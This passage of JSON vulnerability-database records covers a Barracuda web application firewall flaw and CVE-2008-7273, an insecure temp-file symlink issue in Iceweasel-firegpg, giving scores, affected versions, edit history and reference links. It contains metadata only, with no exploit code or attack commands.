{"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": "584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 86, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": 